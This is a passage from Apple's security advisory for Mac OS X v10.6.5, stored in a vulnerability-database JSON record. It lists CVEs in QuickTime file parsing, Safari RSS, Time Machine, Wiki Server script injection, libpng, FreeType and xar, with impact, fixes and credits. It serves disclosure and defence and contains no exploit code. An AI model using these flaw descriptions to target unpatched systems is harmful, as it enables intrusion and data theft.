Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3789\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted avi file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue is in QuickTime's handling of avi files. Viewing a maliciously crafted avi file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of avi files. Credit to Damian Put working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3790\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickTime's handling of movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of movie files. Credit to Honggang Ren of Fortinet's FortiGuard Labs for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3791\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in QuickTime's handling of MPEG encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3792\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A signedness issue exists in QuickTime's handling of MPEG encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of MPEG encoded movie files. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3793\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in the handling of Sorenson encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of Sorenson encoded movie files. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative and Carsten Eiram of Secunia Research for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3794\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted FlashPix image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in QuickTime's handling of FlashPix images. Viewing a maliciously crafted FlashPix image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3795\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted GIF image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An unitialized memory access issue exists in QuickTime's handling of GIF images. Viewing a maliciously crafted GIF image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n Safari RSS\r\n\r\n CVE-ID: CVE-2010-3796\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Accessing a maliciously crafted "feed:" URL may lead to the disclosure of sensitive information\r\n\r\n Description: Java applets are allowed in RSS feeds. Since Java applets can modify the loading DOM, accessing a maliciously crafted "feed:" URL may lead to the disclosure of sensitive information. This issue is addressed by disallowing Java applets in RSS feeds. Credit to Jason Hullinger of IOActive for reporting this issue.\r\n\r\n *\r\n\r\n Time Machine\r\n\r\n CVE-ID: CVE-2010-1803\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may access a user's Time Machine information\r\n\r\n Description: The user may designate a remote AFP volume to be used for Time Machine backups. Time Machine does not verify that the same physical device is being used for subsequent backup operations. An attacker who is able to spoof the remote AFP volume can gain access to the user's backup information. This issue is addressed by verifying the unique identifier associated with a disk for backup operations. This issue does not affect Mac OS X v10.5 systems. Credit to Renaud Deraison of Tenable Network Security, Inc. for reporting this issue.\r\n\r\n *\r\n\r\n Wiki Server\r\n\r\n CVE-ID: CVE-2010-3797\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A user who can edit wiki pages may obtain the credentials of other users\r\n\r\n Description: A JavaScript injection issue exists in Wiki Server. A user who can edit wiki pages may obtain the credentials of any user who visits the edited pages. This issue is addressed through improved input validation. This issue only affects Mac OS X Server systems. Credit: Apple.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2010-1205, CVE-2010-2249, CVE-2010-0205\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in libpng version 1.2.41\r\n\r\n Description: Multiple vulnerabilities exist in libpng version 1.2.42, the most serious of which may lead to arbitrary code execution. These issues are addressed by updating to version 1.2.44. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2009-0946, CVE-2010-2497, CVE-2010-2498, CVE-2010-2499, CVE-2010-2500, CVE-2010-2519, CVE-2010-2520, CVE-2010-2805, CVE-2010-2806, CVE-2010-2807, CVE-2010-2808, CVE-2010-3053, CVE-2010-3054\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in FreeType 2.3.9\r\n\r\n Description: Multiple vulnerabilities exist in FreeType 2.3.9, the most serious of which may lead to arbitrary code execution when processing a maliciously crafted font. These issues are addressed by updating FreeType to version 2.4.2. Further information is available via the FreeType site at http://www.freetype.org/\r\n\r\n *\r\n\r\n xar\r\n\r\n CVE-ID: CVE-2010-3798\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted xar archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in xar. Extracting a maliciously crafted xar archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit: Apple.\r\n\r\n", "modified": "2010-11-18T00:00:00", "published": "2010-11-18T00:00:00", "id": "SECURITYVULNS:DOC:25153", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25153", "title": "About the security content of Mac OS X v10.6.5 and Security Update 2010-007", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}